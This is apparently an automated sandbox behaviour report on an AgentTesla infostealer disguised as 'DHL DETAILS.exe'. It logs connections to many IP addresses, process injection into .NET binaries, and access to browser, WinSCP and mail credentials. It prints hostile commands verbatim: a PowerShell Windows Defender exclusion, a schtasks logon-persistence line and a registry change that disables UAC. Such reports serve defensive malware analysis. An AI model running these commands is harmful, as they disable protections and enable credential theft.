Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.72.165 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 170.82.231.253 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.151.79.84 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 173.212.240.168 46664
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.210.127.15 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 113.252.44.133 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.174.145.11 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.85.103.129 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.7.65.18 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.19.7.61 49319
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.40 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.42 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 170.239.207.241 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 88.210.20.144 20000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.157.254.26 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.138.73.54 44017
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 200.54.22.74 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.250.13.88 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 65.1.40.47 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.243.205.1 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 218.145.131.182 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.228.213.24 3128

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E58008
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C87008
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 687008

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Queries volume information: C:\Users\user\Desktop\DHL DETAILS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Queries volume information: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Queries volume information: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\DHL DETAILS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\AppData\Roaming\svchost.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 45052, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
